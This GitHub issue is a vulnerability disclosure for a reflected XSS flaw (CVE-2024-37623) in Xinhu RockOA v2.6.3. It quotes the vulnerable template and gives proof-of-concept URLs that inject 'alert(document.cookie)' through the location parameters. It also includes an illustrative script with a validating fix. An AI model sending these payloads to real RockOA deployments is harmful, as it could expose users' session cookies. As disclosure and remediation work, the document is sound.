Hebing123 / cve


Reflected XSS Vulnerability in Xinhu RockOA v2.6.3 #51

Open Hebing123 opened 4 months ago

Hebing123 commented 4 months ago

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in Xinhu RockOA v2.6.3.

Details

The XSS vulnerability originates from /webmain/main/kaoqin/tpl_kaoqin_locationchange.html:

<script>

var callback = '<?=$callback?>'; // callback function
var init = function() {
    // $location_x and $location_y are echoed unescaped into a JS expression
    var center = new qq.maps.LatLng(<?=$location_x?>,<?=$location_y?>);
    map = new qq.maps.Map(document.getElementById('container'),{
        center: center,
        zoom: <?=$scale?>
    });

    marker = new qq.maps.Marker({
        position: center,
        map: map,
        draggable:true,
        title:'Click the map to set the position'
    });

    // click the map to change the position
    qq.maps.event.addListener(map, 'click', function(evt) {
        marker.setPosition(evt.latLng);
    });

    return; // the code below is unreachable in the original template
    infoWin = new qq.maps.InfoWindow({
        map: map
    });
    infoWin.open();
    infoWin.setContent('Location:');
    infoWin.setPosition(map.getCenter());
}

See https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/webmain/main/kaoqin/tpl_kaoqin_locationchange.html#L21: $location_x and $location_y are not filtered.

Proof of Concept (PoC)

http(s)://ip:port/?a=locationchange&m=kaoqin&d=main&location_y=118.167806&scale=12&callback=backshow1717123083601_5578&location_x=);alert(document.cookie);%3C!--

and

http(s)://ip:port/?a=locationchange&m=kaoqin&d=main&location_y=118.167806&scale=12&callback=backshow1717123083601_5578&location_y=);alert(document.cookie);%3C!--
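The JavaScript-context break the PoC above relies on, and the type-enforcing fix, as an added example that is not part of the issue or of RockOA's own code. It models PHP's unescaped `<?= $var ?>` echo with a string substitution over the template's three interpolation points, runs the rendered script against stubbed `qq.maps`, `document` and `alert` objects, and compares it with a hardened renderer that only accepts values matching the grammar of the literal each parameter lands in. The function names (`renderVulnerable`, `renderHardened`, `execute`, `demo`), the reduced template, the benign `location_x` value and the cookie string are all constructed for this example; the payload strings are the URL-decoded values from the PoC (`%3C!--` is `<!--`).

```javascript
// Added example, not RockOA code: models the unescaped `<?=$var?>` echo into the
// JavaScript of tpl_kaoqin_locationchange.html and a hardened replacement.

// Reduced template (constructed): only the lines that interpolate request values.
const TEMPLATE = [
  "var callback = '<?=$callback?>';",
  "var center = new qq.maps.LatLng(<?=$location_x?>,<?=$location_y?>);",
  "var map = new qq.maps.Map(document.getElementById('container'), { center: center, zoom: <?=$scale?> });",
].join("\n");

const INTERPOLATION = /<\?=\$(\w+)\?>/g;

// Vulnerable: substitutes the raw request value, exactly as `<?=$location_x?>` does.
function renderVulnerable(params) {
  return TEMPLATE.replace(INTERPOLATION, (_, name) => String(params[name] ?? ""));
}

// Rejects any value that does not match the literal grammar of its slot.
function assertMatch(value, pattern, name) {
  const s = String(value ?? "");
  if (!pattern.test(s)) throw new TypeError(`rejected ${name}: ${JSON.stringify(s)}`);
  return s;
}

// One validator per interpolation point: numeric literals for the coordinates,
// an integer for zoom, and a bare identifier for the quoted callback name.
const VALIDATORS = {
  location_x: (v) => assertMatch(v, /^-?\d{1,3}(\.\d{1,10})?$/, "location_x"),
  location_y: (v) => assertMatch(v, /^-?\d{1,3}(\.\d{1,10})?$/, "location_y"),
  scale: (v) => assertMatch(v, /^\d{1,2}$/, "scale"),
  callback: (v) => assertMatch(v, /^[A-Za-z_]\w*$/, "callback"),
};

// Hardened: a value that could close its literal never reaches the page.
function renderHardened(params) {
  return TEMPLATE.replace(INTERPOLATION, (_, name) => {
    const validate = VALIDATORS[name];
    if (!validate) throw new TypeError(`no validator for ${name}`);
    return validate(params[name]);
  });
}

// Executes the rendered script with stubs standing in for the map SDK, the DOM and
// alert(); returns every alert() argument, so a non-empty array means injected code ran.
function execute(rendered) {
  const alerts = [];
  const qq = { maps: { LatLng: function () {}, Map: function () {} } };
  const document = {
    cookie: "PHPSESSID=constructed-example-value", // constructed, not a real session
    getElementById: () => null,
  };
  new Function("qq", "document", "alert", rendered)(qq, document, (m) => alerts.push(String(m)));
  return alerts;
}

// Request parameters: values from the PoC URLs, plus a constructed benign location_x.
const BENIGN = {
  callback: "backshow1717123083601_5578",
  location_x: "24.479834",
  location_y: "118.167806",
  scale: "12",
};
// URL-decoded PoC payloads; `<!--` starts an HTML-like comment that swallows the rest of the line.
const PAYLOAD_X = { ...BENIGN, location_x: ");alert(document.cookie);<!--" };
const PAYLOAD_Y = { ...BENIGN, location_y: ");alert(document.cookie);<!--" };

function demo() {
  const rejected = (p) => {
    try { renderHardened(p); return false; } catch (e) { return e instanceof TypeError; }
  };
  return {
    vulnerableX: execute(renderVulnerable(PAYLOAD_X)), // cookie leaks via alert()
    vulnerableY: execute(renderVulnerable(PAYLOAD_Y)),
    hardenedRejectsX: rejected(PAYLOAD_X),
    hardenedRejectsY: rejected(PAYLOAD_Y),
    benign: execute(renderHardened(BENIGN)), // [] : no alert() call
  };
}

console.log(demo());
```

With the payload in `location_x`, the vulnerable render produces `new qq.maps.LatLng();alert(document.cookie);<!--,118.167806);`, which is valid sloppy-mode JavaScript: the `<!--` turns the dangling `,118.167806);` into a comment, which is why the PoC needs no closing delimiter. The hardened renderer fails closed, raising before any HTML is emitted; an equivalent PHP-side fix is to cast the coordinates and zoom to numbers and restrict the callback to an identifier before they reach the template.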

Hebing123 commented 4 months ago

CVE-2024-37623